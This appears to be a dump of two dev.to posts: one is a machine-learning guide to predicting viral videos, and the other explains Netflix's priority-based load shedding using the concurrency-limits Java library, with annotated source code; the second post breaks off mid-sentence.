https://dev.to/victoramit/how-to-predict-the-next-viral-video-using-machine-learning-2m80
machinelearning, deeplearning, ai, python
![Article Image](https://i.ibb.co/fth730s/aab00ff9-7d3e-4611-b95c-23aa992b3ffc-ezgif-com-video-to-gif-converter.gif&w=1080) In today's digital age, the quest for predicting the next viral video has become the holy grail for content creators and marketers alike. With platforms like TikTok redefining what counts as a viral video, understanding the dynamics behind video sharing and the elements that captivate millions is more valuable than ever. The intersection of machine learning models and social media analytics offers unprecedented opportunities to not just comprehend but also anticipate the trends that will dominate your feeds. Whether you're aiming to achieve TikTok earnings for 2 million likes or simply looking to understand the mechanics of going viral on social media, leveraging the power of predictive analytics can unlock new realms of digital strategy. This article will guide you through the journey of Predicting the Next Viral Video, starting from grasping the essence of viral videos—which often combine an authentic point of view with strong emotional appeal and captivating visual elements—to deploying sophisticated machine learning models capable of identifying potential hits. You will learn about the importance of data collection and preprocessing, the intricacies of feature engineering tailored to video features like text captions and recommendation algorithms, and the strategies for building and optimizing predictive models. By the end, deploying the model will no longer feel like an insurmountable challenge, but rather a calculated step toward harnessing the chaotic energy of viral video sharing, ensuring you have the tools needed to make informed predictions in the rapidly evolving landscape of short videos and social media platforms. ## Understanding Virality ### What is Virality? Virality, in the context of digital marketing, refers to the phenomenon where content spreads rapidly across social media platforms due to shares, likes, and other forms of engagement from users. This rapid spread is akin to the way a virus transmits, hence the term "virality" [1](https://influencermarketinghub.com/glossary/virality/). Viral content can significantly boost visibility and engagement, impacting a brand or individual's presence online [2](https://later.com/social-media-glossary/viral/). It can occur organically, driven by the content's appeal, or as a result of strategic marketing efforts [2](https://later.com/social-media-glossary/viral/). ### Factors Contributing to Virality Several key factors influence whether a video or content piece becomes viral. Emotional appeal is crucial; content that evokes strong feelings like joy, surprise, or awe is more likely to be shared [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). Relatability also plays a significant role, as content that viewers find personally resonant or reflective of common experiences tends to spread widely [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). Timeliness adds to virality, with content relevant to current trends or events gaining traction faster [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). The content's brevity and clarity help maintain viewer attention, making concise messages more effective [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). High production quality, while not mandatory, can enhance the perceived value of the content [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). Incorporating music and sound strategically can amplify emotional responses and engagement [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). A clear call to action, such as prompts to share or subscribe, can also encourage viewers to spread the content further [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). Optimizing content for specific platforms by using relevant hashtags, captions, and engaging thumbnails is essential for maximizing reach [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). Finally, proactive distribution and promotion across various platforms and collaborations with influencers can significantly increase a content piece's visibility and potential to go viral [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). Data analysis plays a pivotal role in understanding audience preferences and refining strategies to boost virality [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). ## The Essence of Viral Videos Viral videos are online clips that achieve sudden and widespread popularity, often characterized by widespread sharing, rapid engagement, and extensive reach [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). These videos transcend geographical and cultural boundaries, sparking discussions worldwide. The key to their success often lies in their ability to tap into universal themes or emotions, making them relatable and emotionally engaging [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). ### Key Characteristics of Viral Content Viral content typically includes videos that are hard to ignore and easy to share. Emotional appeal is crucial; videos that evoke strong reactions like laughter, awe, or empathy are more likely to be shared [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). Relatability also plays a significant role, as people tend to share content that reflects their own experiences or cultural references [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). Moreover, the timing of a video’s release can significantly affect its virality, especially if it aligns with current trends or events [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). High-quality production and strategic use of music and sound can further enhance a video's appeal [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). Effective viral videos also incorporate elements that encourage viewer interaction, such as challenges, duets, or prompts for comments, which can drive higher engagement rates and further amplify their reach [5](https://medium.com/@trulydigitalmedia/the-science-of-going-viral-analyzing-tiktoks-viral-phenomenon-1fcfbd5753d3). Utilizing relevant hashtags and engaging with trending topics or challenges are additional tactics that help increase a video's visibility and shareability [5](https://medium.com/@trulydigitalmedia/the-science-of-going-viral-analyzing-tiktoks-viral-phenomenon-1fcfbd5753d3). ### Case Studies Several case studies highlight the strategic elements behind successful viral videos. For instance, the "Ice Bucket Challenge" not only entertained but also raised awareness for ALS, combining entertainment with a cause, which encouraged widespread participation and sharing [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). Another example is humorous and heartwarming videos, like those featuring unexpected acts of kindness or adorable animals, which often go viral due to their emotional content [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). In the realm of planned virality, some videos are crafted by influencers and marketers who leverage social media algorithms and optimal posting times to maximize visibility and engagement [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). These efforts are complemented by content that is inherently shareable, be it through humor, relatability, or timely relevance to current events and trends [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). In conclusion, creating viral content involves a blend of creativity, strategic planning, and an understanding of what resonates with audiences on a human level. Whether by chance or design, the elements of shareability, emotional engagement, and timely relevance are consistently at the core of viral video success. ## Overview of Machine Learning Machine learning, a cornerstone of modern artificial intelligence, leverages algorithms and statistical models to enable computers to perform tasks without explicit programming. By analyzing patterns and learning from data, machine learning can make informed predictions and decisions [6](https://www.jumpdatadriven.com/machine-learning-for-video-analysis-what-it-is-and-how-it-works/). ### Basics of Machine Learning At the heart of machine learning is the ability to identify patterns and make data-driven recommendations. This process begins with the collection of large datasets, which are then used to train algorithms. The trained model can recognize similar patterns in new data and provide relevant outputs, such as identifying objects in videos or predicting video virality [7](https://www.ridgerun.com/video-based-ai). Machine learning models are particularly effective in handling complex datasets and can be applied to a variety of data types, including text, images, and videos [6](https://www.jumpdatadriven.com/machine-learning-for-video-analysis-what-it-is-and-how-it-works/). ### Types of Algorithms Used Machine learning algorithms are broadly categorized into three types: supervised learning, unsupervised learning, and reinforcement learning. Supervised learning involves training a model on a labeled dataset, where the input data is tagged with the correct output. This method is ideal for tasks where the desired outcome is known, such as classifying videos based on their content [8](https://www.analyticsvidhya.com/blog/2023/04/machine-learning-for-social-media/). Unsupervised learning, on the other hand, does not require labeled data. Instead, it identifies patterns and relationships in the data on its own, which is useful for discovering hidden structures in untagged data [8](https://www.analyticsvidhya.com/blog/2023/04/machine-learning-for-social-media/). Reinforcement learning is a dynamic process where models learn to make decisions by receiving feedback on their actions. This feedback, in the form of rewards or penalties, helps the model adjust its strategies to achieve the best results in a given environment [8](https://www.analyticsvidhya.com/blog/2023/04/machine-learning-for-social-media/). Each type of learning algorithm has its strengths and is chosen based on the specific requirements of the task at hand. For video analysis, convolutional neural networks (CNNs) and recurrent neural networks (RNNs) are commonly used. These networks are capable of handling the spatial and temporal data inherent in videos, making them suitable for tasks such as object recognition and activity recognition in video streams [6](https://www.jumpdatadriven.com/machine-learning-for-video-analysis-what-it-is-and-how-it-works/). By leveraging these algorithms, machine learning not only enhances the efficiency of video analysis but also opens up new possibilities for predictive analytics in content creation. This technological advancement allows content creators and marketers to anticipate audience preferences and tailor their strategies accordingly [9](https://divvyhq.com/content-automation/machine-learning-in-content-marketing/). ## Data Collection and Preprocessing ### Sources of Data Your journey in predicting the next viral video starts with the meticulous collection of data. For instance, by leveraging the Twitter streaming API, you can gather a vast array of video links shared over a 24-hour period [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). This method ensures a diverse dataset, capturing a wide range of content from various users and contexts. Additionally, platforms like Kaggle provide access to structured data repositories that include detailed video attributes which are essential for in-depth analysis [11](https://kala-shagun.medium.com/youtube-virality-prediction-using-bert-and-catboost-ensemble-86e90c334921). ### Cleaning and Preparing Data Once data collection is complete, the critical phase of data cleaning begins. This involves several meticulous steps to ensure the quality and usability of your data for machine learning models. Initially, you must handle basic cleaning tasks such as removing duplicates, correcting inconsistencies, and dealing with missing values [12](https://www.obviously.ai/post/data-cleaning-in-machine-learning). For example, datasets often contain duplicate records that can skew your analysis and must be removed to maintain the integrity of your models [13](https://www.v7labs.com/blog/data-cleaning-guide). Further, the transformation of categorical data into a numerical format is crucial. Techniques like Label Encoding convert text data into numbers, making it readable for algorithms [11](https://kala-shagun.medium.com/youtube-virality-prediction-using-bert-and-catboost-ensemble-86e90c334921). Normalization of numerical columns, such as video duration, helps in mitigating bias by ensuring no single feature dominates [11](https://kala-shagun.medium.com/youtube-virality-prediction-using-bert-and-catboost-ensemble-86e90c334921). Moreover, the preprocessing phase involves structuring your data to enhance machine learning readiness. This includes organizing data into a single file or table, ensuring it contains minimal missing values, and removing irrelevant information such as personal identifiers [12](https://www.obviously.ai/post/data-cleaning-in-machine-learning). Each step is vital to refine the dataset, which directly influences the effectiveness of your predictive model. By adhering to these meticulous preprocessing steps, you set a strong foundation for building robust machine learning models that can more accurately predict viral video trends. ## Feature Engineering In the domain of predicting viral videos, feature engineering plays a pivotal role by transforming raw data into a format that is better suited for models to understand and predict outcomes. This section covers the key processes involved in identifying and creating new features that significantly influence a video's potential to go viral. ### Identifying Key Features The initial step in feature engineering is to identify which characteristics of videos can predict virality. A mixed-methods strategy is employed where videos featuring popular hashtags on TikTok are analyzed to determine indicators of virality [14](https://arxiv.org/pdf/2111.02452). For instance, the number of likes is a direct measure of a video's popularity and potential virality. Additionally, the creator's popularity and specific video attributes such as the scale and point of view (e.g., a close-up or a medium-scale shot from a second-person perspective) are found to have substantial impacts on a video's viral potential [14](https://arxiv.org/pdf/2111.02452). Moreover, the inclusion of trending hashtags at the time of posting increases the likelihood of a video going viral [14](https://arxiv.org/pdf/2111.02452). A logistic regression model, with an impressive Area Under the ROC Curve (AUC) of 0.93, demonstrates the effectiveness of these identified features in distinguishing between videos that will go viral and those that will not [14](https://arxiv.org/pdf/2111.02452). ### Creating New Features Once key indicators are identified, the next step is creating new features that enhance the predictive power of the models. This involves deriving additional features from existing data, which can provide deeper insights into the factors that contribute to a video's success. For example, features extracted from platforms like Twitter and YouTube include video views, likes, and comments, which are crucial for assessing engagement [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). Modifiers such as the ratio of views on a particular day to the total views (views ratio), the acceleration of views (views acceleration), and the difference in views over a specific period (views difference) are used to capture the dynamics of user engagement over time [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). These features are then fed into advanced classifiers like Gradient Boosted Decision Trees to predict the virality and popularity of videos more accurately [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). By systematically identifying and creating impactful features, you can significantly enhance the accuracy of machine learning models in predicting the next viral video. This process not only sharpens the predictive analytics but also provides a robust framework for content creators and marketers to strategize their video productions for maximum viral reach. ## Building Predictive Models ### Choosing the Right Algorithm When building predictive models for viral video prediction, selecting the right algorithm is crucial. A Gradient Boosted Decision Tree is often employed due to its effectiveness in handling general classification problems [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). This type of algorithm is particularly adept at managing the complex scenarios typical in predicting video virality, where the aim is to forecast popularity with minimal historical data [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). ### Training and Validation The training and validation of your predictive model are essential steps to ensure its accuracy and reliability. A common method used is the 10-fold validation methodology. Here, 90% of the data is used for training, where both the training window and labeling window data are available, allowing the model to learn which videos become viral or popular. The remaining 10% is then used for validation, predicting the virality or popularity class labels during the labeling window. This approach helps in assessing the precision and recall of the model. The performance is further quantified using metrics such as the area under the precision-recall curve (AUC) and the mean F1 score [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). This rigorous validation process is repeated multiple times with different data subsets to ensure consistency and reliability of the predictive model. The results from these experiments are averaged to provide a robust measure of the model’s predictive accuracy [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). Additionally, the analysis of feature importance highlights that predictions using YouTube data tend to be more accurate than those using Twitter data, suggesting that the platform from which the data is sourced can significantly influence the predictive success of the model [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). This insight is crucial for refining the feature selection in future model iterations, especially when early prediction of recently uploaded videos is a key challenge [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). The need to augment baseline features with additional data mined from original sources is emphasized to enhance the model's accuracy in predicting virality and popularity of new videos [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). By understanding these key aspects of algorithm choice and model validation, you can enhance your ability to predict which videos will capture the public's attention and go viral, thereby informing more strategic content creation and marketing efforts. ## Evaluating Model Performance ### Metrics for Success To effectively evaluate the performance of machine learning models in predicting viral videos, a comprehensive set of metrics is utilized. Sensitivity, specificity, and F1-scores provide a balanced view of model accuracy by measuring both the true positive rate and the ability to avoid false positives [15](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9904219/). Additionally, the Receiver Operating Characteristic (ROC) curves and Area Under the Curve (AUC) values are critical, with high AUC values indicating better model performance. For instance, in one study, the AUC for certain models reached as high as 0.99, demonstrating their exceptional accuracy in specific contexts [15](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9904219/). Moreover, the use of confusion matrices helps in visualizing the performance of each class within the model, allowing for a detailed assessment of both false positives and false negatives [15](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9904219/). This is complemented by evaluating the positive predictive value (PPV) and negative predictive value (NPV), which provide insights into the reliability of the model in predicting viral outcomes. ### Common Pitfalls While evaluating model performance, several common pitfalls can adversely affect the outcomes. One major issue is the premature cessation of model testing, which can lead to misleading conclusions about a model's effectiveness [16](https://fastercapital.com/topics/how-to-avoid-common-pitfalls-and-mistakes-with-video-ads.html). Additionally, small or unrepresentative sample sizes can skew results, making it difficult to generalize findings to broader applications. Bias and confounding factors also pose significant challenges. These can arise from external variables such as seasonal trends or competing content, which might influence the results independently of the model's predictive power [16](https://fastercapital.com/topics/how-to-avoid-common-pitfalls-and-mistakes-with-video-ads.html). It's crucial to account for these factors during the evaluation phase to ensure the accuracy and applicability of the model. Lastly, the choice of metrics itself can lead to biases in model evaluation. For instance, focusing solely on sensitivity might prioritize the detection of viral content but at the expense of increasing false positives. Therefore, a balanced approach that considers multiple metrics is essential for a comprehensive evaluation [17](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC8459865/). By understanding these metrics and being aware of common pitfalls, you can more accurately assess the performance of machine learning models aimed at predicting the next viral video. This rigorous evaluation is key to refining the models and enhancing their predictive capabilities in real-world scenarios. ## Optimizing and Tuning Models ### Hyperparameter Tuning In the realm of machine learning, hyperparameter tuning is essential for enhancing the performance of your models. Hyperparameters, which are settings that are not learned from the data, significantly influence the outcome of the learning process. For example, in a random forest model, hyperparameters such as `max_features`, `number_trees`, and `random_state` need to be optimized [18](https://www.analyticsvidhya.com/blog/2015/12/improve-machine-learning-results/). This optimization involves selecting optimal values that increase the accuracy of the machine learning model, a process that can be repeated across various well-performing models to identify the most effective settings [18](https://www.analyticsvidhya.com/blog/2015/12/improve-machine-learning-results/). Different methods are employed to find these optimal values. Grid search, for instance, systematically works through multiple combinations of parameter values, providing a comprehensive method to determine the best combination for model performance [19](https://www.geeksforgeeks.org/hyperparameter-tuning/). Alternatively, random search selects hyperparameter values at random and can often find a good combination much faster than the exhaustive grid search [19](https://www.geeksforgeeks.org/hyperparameter-tuning/). More sophisticated techniques like Bayesian optimization consider previous results to guide the selection of the next set of hyperparameters, often leading to faster and more effective tuning [19](https://www.geeksforgeeks.org/hyperparameter-tuning/). ### Improving Accuracy To ensure that improvements in model accuracy are genuine and not due to overfitting, cross-validation is used. This technique involves partitioning the data into subsets, training the model on some subsets while testing it on others. This method helps achieve more generalized relationships and provides a robust estimate of the model’s performance on unseen data [18](https://www.analyticsvidhya.com/blog/2015/12/improve-machine-learning-results/). For instance, tuning an XGBoost model involves adjusting parameters like `gamma`, `eta`, and `learning_rate`, which control the model's complexity and learning speed. Studies have shown that a tuned XGBoost model can achieve up to 88% accuracy, with precision and recall rates also showing significant improvement [20](https://www.mdpi.com/2079-9292/10/23/2962)[21](https://www.researchgate.net/publication/356595714_Optimizing_Prediction_of_YouTube_Video_Popularity_Using_XGBoost). This demonstrates the effectiveness of careful hyperparameter tuning and model training practices in enhancing the predictive capabilities of machine learning models. By meticulously optimizing hyperparameters and employing rigorous validation techniques, you can significantly improve the accuracy and generalizability of your predictive models, ensuring they perform well across different datasets and real-world scenarios. ## Deploying the Model Once your machine learning model is ready for real-world application, the next critical step is deployment. Deployment involves integrating the model into an existing production environment where it can start providing value based on its predictive capabilities. ### Integration with Platforms Deploying a machine learning model effectively means ensuring it can interact seamlessly with other applications and services. For instance, models can be hosted on cloud platforms and accessed via API endpoints, which act as intermediaries between the model and the end-users [22](https://neptune.ai/blog/deploying-computer-vision-models). This setup allows for the model to be consumed through various interfaces, depending on the end-user’s needs, ranging from simple command-line interfaces to more complex web-based or app-based UIs [22](https://neptune.ai/blog/deploying-computer-vision-models). In some cases, models are deployed on edge devices where data consumption occurs at the point of data origin, which is crucial for applications requiring low latency [22](https://neptune.ai/blog/deploying-computer-vision-models). ### Monitoring and Maintenance After deployment, continuous monitoring and maintenance are essential to ensure the model performs as expected over time. This involves tracking performance metrics such as accuracy, precision, and recall, and watching for model drift, which occurs when the model's performance degrades due to changes in the underlying data [23](https://www.fiddler.ai/model-monitoring-tools/how-do-you-maintain-a-deployed-model). Tools like Fiddler or Modelbit provide functionalities to monitor these metrics effectively, offering insights into model behavior and helping detect any performance issues promptly [23](https://www.fiddler.ai/model-monitoring-tools/how-do-you-maintain-a-deployed-model) [24](https://www.reddit.com/r/mlops/comments/15z3bfo/model_performance_in_production/). Moreover, regular updates and retraining of the model with new data are necessary to keep it relevant and effective. Retraining involves using new data to update the model's understanding and adjust its predictions, which helps in maintaining its accuracy [23](https://www.fiddler.ai/model-monitoring-tools/how-do-you-maintain-a-deployed-model). This process can be automated using machine learning pipelines that handle data ingestion, model retraining, evaluation, and redeployment smoothly [25](https://www.sigmoid.com/blogs/5-best-practices-for-deploying-ml-models-in-production/). By ensuring robust integration with platforms and diligent monitoring and maintenance, you can maximize the effectiveness and longevity of your deployed machine learning model, making it a valuable asset in your predictive analytics arsenal. ## Conclusion Throughout this article, we've embarked on a comprehensive exploration of the fascinating intersection between machine learning and social media trends, specifically focusing on the prediction of viral videos. By delving into the core elements that often underpin viral content, such as emotional resonance, timeliness, and relatability, and coupling these with the sophisticated capabilities of machine learning models, we've uncovered potent strategies that can forecast which videos are likely to captivate and engage audiences on a massive scale. In doing so, the article has highlighted the importance of data collection, preprocessing, and the intricacies of feature engineering, thereby equipping readers with the knowledge to harness the predictive power of machine learning for their digital strategies. As we conclude, it's clear that the potential for machine learning to revolutionize content creation and marketing is immense, offering a blueprint for not just reacting to digital trends but proactively setting them. However, the journey does not end here. The rapidly evolving nature of social media and machine learning technology suggests a future where predictive analytics becomes even more integral to success in the digital realm. Readers are encouraged to continue exploring, experimenting with, and refining their approaches to machine learning in content prediction, ensuring they stay at the forefront of this dynamic intersection of technology and creativity. ## FAQs **1. How does machine learning forecast future events?** Machine learning forecasting involves using a trained algorithm that analyzes historical data to produce likely outcomes for unknown variables in new data sets. **2. Is it possible for machine learning to generate predictions?** Yes, machine learning can generate predictions and often does so using larger and more complex datasets than traditional methods, such as trend analysis, which typically only uses past sales data for forecasting. **3. What is the most effective machine learning algorithm for making predictions?** Linear regression is considered one of the most effective supervised learning algorithms for making predictions. It is used to forecast values within a continuous range, like sales figures or pricing. **4. How do machine learning models predict future outcomes?** Machine learning models operate by learning from data, identifying patterns, and understanding relationships within the data. This enables them to predict outcomes for new, previously unseen data. For applications that require immediate results, models that can quickly process and analyze incoming data in real-time are necessary. ## References [1] - [https://influencermarketinghub.com/glossary/virality/](https://influencermarketinghub.com/glossary/virality/) [2] - [https://later.com/social-media-glossary/viral/](https://later.com/social-media-glossary/viral/) [3] - [https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared) [4] - [https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/) [5] - [https://medium.com/@trulydigitalmedia/the-science-of-going-viral-analyzing-tiktoks-viral-phenomenon-1fcfbd5753d3](https://medium.com/@trulydigitalmedia/the-science-of-going-viral-analyzing-tiktoks-viral-phenomenon-1fcfbd5753d3) [6] - [https://www.jumpdatadriven.com/machine-learning-for-video-analysis-what-it-is-and-how-it-works/](https://www.jumpdatadriven.com/machine-learning-for-video-analysis-what-it-is-and-how-it-works/) [7] - [https://www.ridgerun.com/video-based-ai](https://www.ridgerun.com/video-based-ai) [8] - [https://www.analyticsvidhya.com/blog/2023/04/machine-learning-for-social-media/](https://www.analyticsvidhya.com/blog/2023/04/machine-learning-for-social-media/) [9] - [https://divvyhq.com/content-automation/machine-learning-in-content-marketing/](https://divvyhq.com/content-automation/machine-learning-in-content-marketing/) [10] - [https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf) [11] - [https://kala-shagun.medium.com/youtube-virality-prediction-using-bert-and-catboost-ensemble-86e90c334921](https://kala-shagun.medium.com/youtube-virality-prediction-using-bert-and-catboost-ensemble-86e90c334921) [12] - [https://www.obviously.ai/post/data-cleaning-in-machine-learning](https://www.obviously.ai/post/data-cleaning-in-machine-learning) [13] - [https://www.v7labs.com/blog/data-cleaning-guide](https://www.v7labs.com/blog/data-cleaning-guide) [14] - [https://arxiv.org/pdf/2111.02452](https://arxiv.org/pdf/2111.02452) [15] - [https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9904219/](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9904219/) [16] - [https://fastercapital.com/topics/how-to-avoid-common-pitfalls-and-mistakes-with-video-ads.html](https://fastercapital.com/topics/how-to-avoid-common-pitfalls-and-mistakes-with-video-ads.html) [17] - [https://www.ncbi.nlm.nih.gov/pmc/articles/PMC8459865/](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC8459865/) [18] - [https://www.analyticsvidhya.com/blog/2015/12/improve-machine-learning-results/](https://www.analyticsvidhya.com/blog/2015/12/improve-machine-learning-results/) [19] - [https://www.geeksforgeeks.org/hyperparameter-tuning/](https://www.geeksforgeeks.org/hyperparameter-tuning/) [20] - [https://www.mdpi.com/2079-9292/10/23/2962](https://www.mdpi.com/2079-9292/10/23/2962) [21] - [https://www.researchgate.net/publication/356595714_Optimizing_Prediction_of_YouTube_Video_Popularity_Using_XGBoost](https://www.researchgate.net/publication/356595714_Optimizing_Prediction_of_YouTube_Video_Popularity_Using_XGBoost) [22] - [https://neptune.ai/blog/deploying-computer-vision-models](https://neptune.ai/blog/deploying-computer-vision-models) [23] - [https://www.fiddler.ai/model-monitoring-tools/how-do-you-maintain-a-deployed-model](https://www.fiddler.ai/model-monitoring-tools/how-do-you-maintain-a-deployed-model) [24] - [https://www.reddit.com/r/mlops/comments/15z3bfo/model_performance_in_production/](https://www.reddit.com/r/mlops/comments/15z3bfo/model_performance_in_production/) [25] - [https://www.sigmoid.com/blogs/5-best-practices-for-deploying-ml-models-in-production/](https://www.sigmoid.com/blogs/5-best-practices-for-deploying-ml-models-in-production/)
victoramit
1,904,888
How to Ensure High Priority for Main Service Traffic - Learning from Netflix's Established Practices
Scenario In the following Netflix tech blog, they propose a scenario and solution where...
0
2024-07-05T00:45:58
https://dev.to/bochaoli95/how-to-ensure-high-priority-for-main-service-traffic-learning-from-netflixs-established-practices-4bl1
## Scenario In the following Netflix tech blog, they propose a scenario and solution where traffic is allocated based on service priority. By shedding non-core functionality traffic, they ensure that resources are dedicated to the main process. [Enhancing Netflix Reliability with Service-Level Prioritized Load Shedding](https://netflixtechblog.com/enhancing-netflix-reliability-with-service-level-prioritized-load-shedding-e735e6ce8f7d) Let's take an example of an online shopping mall. Placing an order is our **core functionality**. While users are browsing products, preloading product information to achieve faster response times **is relatively less important**. If this interface is unavailable, it will only result in slightly longer wait times when clicking on product details (e.g., increasing from 20ms to 150ms), but it will not affect the main shopping process. In the current microservices architecture context, a common solution is to split services and deploy instances for the order service and instances for the product information preloading service separately. However, this approach increases the **overall complexity of the services and raises operational costs**. Additionally, splitting traffic at the gateway level incurs some performance overhead. Using product information loading as an example, preloading is a non-core function, but loading product information itself is a core function of shopping. If we want to implement microservices splitting, we must divide the product information service into two sets of instances. This approach could lead to each module being split into two sets of services: core and non-core. Combining all non-core functions into one service does not align with microservices principles. ## Solution In this article, a sharding mechanism within an instance was implemented using the open-source [Netflix/concurrency-limits](https://github.com/Netflix/concurrency-limits) Java library. The usage of this open-source component is very simple. The core idea is that requests at different levels carry different header values, and the data is sharded according to these header values in a custom interceptor. The core code is as follows: ``` Filter filter = new ConcurrencyLimitServletFilter( new ServletLimiterBuilder() .named("playapi") .partitionByHeader("X-Netflix.Request-Name") .partition("user-initiated", 1.0) .partition("pre-fetch", 0.0) .build()); ``` This effectively implements the sharding functionality, prioritizing high-priority requests. When resources are constrained, low-priority requests will be rejected. Of course, to write code more elegantly, you can also use the predefined methods. The component has already enumerated several levels such as CRITICAL, DEGRADED, BEST_EFFORT, and BULK. We just need to ensure that the corresponding headers are set in the request. In this article, there is a detailed description of resource usage, the selection of resource exhaustion metrics, and the thresholds for these metrics. For instance, for CPU-intensive applications, more attention should be paid to CPU usage, whereas for IO-intensive applications, focusing on IO response time ensures that core IO operations are not affected by lower-priority IO. ##Source Code Analysis In fact, in the work process, introducing a component and making it run, meet requirements, and pass tests is not very difficult. However, during this process, many edge cases require a deep understanding of the source code. Let's briefly analyze why this Filter can achieve such functionality and ensure the main service's operation. For the ConcurrencyLimitServletFilter class, it inherits from javax.servlet.Filter, which is the most general filter. This is easy to understand and reduces our learning curve. It then uses the builder pattern, calling ServletLimiterBuilder to generate a well-assembled ServletLimiter.In this process, we need to set the required key and value. In the overridden method of this filter, we can see the following code: limiter.acquire((HttpServletRequest) request); This is the core of the decision-making process, determining whether the request can be accepted. If it cannot, it will return a **429 **status code. ``` @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { Optional<Limiter.Listener> listener = limiter.acquire((HttpServletRequest)request); if (listener.isPresent()) { try { chain.doFilter(request, response); listener.get().onSuccess(); } catch (Exception e) { listener.get().onIgnore(); throw e; } } else { outputThrottleError((HttpServletResponse)response); } } ``` The acquire method is defined in the Limiter interface. Its function is to determine **whether a token can be retrieved** from the token bucket.Because we included partitions in the build process, an AbstractPartitionedLimiter is created for sharding. Next, let's analyze the source code of the core acquire method. ``` @Override public Optional<Listener> acquire(ContextT context) { // Resolve the partition based on the context final Partition partition = resolvePartition(context); try { // Acquire the reentrant lock to ensure thread-safe access to shared resources lock.lock(); // Check if the request should bypass the rate limiting if (shouldBypass(context)){ return createBypassListener(); // Return a bypass listener } // Check if the current inflight requests have reached the global limit and if the partition's limit is exceeded if (getInflight() >= getLimit() && partition.isLimitExceeded()) { lock.unlock(); // Release the lock before handling rejection // If a backoff delay is configured and the number of delayed threads is below the maximum allowed, introduce a delay if (partition.backoffMillis > 0 && delayedThreads.get() < maxDelayedThreads) { try { delayedThreads.incrementAndGet(); // Increment the count of delayed threads TimeUnit.MILLISECONDS.sleep(partition.backoffMillis); // Introduce the delay } catch (InterruptedException e) { Thread.currentThread().interrupt(); // Restore the interrupted status } finally { delayedThreads.decrementAndGet(); // Decrement the count of delayed threads } } return createRejectedListener(); // Return a rejected listener } // Record the request in the partition's busy count partition.acquire(); return Optional.of(createListener()); } finally { if (lock.isHeldByCurrentThread()) lock.unlock(); // Ensure the lock is released if held by the current thread } } ``` The source code mainly consists of several steps. 1. It retrieves the partition information for the request. 2. To ensure concurrency safety, it uses a reentrant lock in Java. 3. The core logic is to check if getInflight() >= getLimit() && partition.isLimitExceeded(). getInflight() < getLimit() indicates that the current number of concurrent requests is less than the limit, allowing more requests to enter. The getLimit() method is the core token acquisition algorithm of the entire component. This limit is updated by continuously sampling the system's condition. In other words, when our request volume is very high, this sample will detect the system's condition and inform the requesting thread that the current threads are limited and cannot support more requests. So, how are different levels of requests implemented? This is determined by partition.isLimitExceeded(). Each partition has its own busy and limit parameters, and the check is performed as 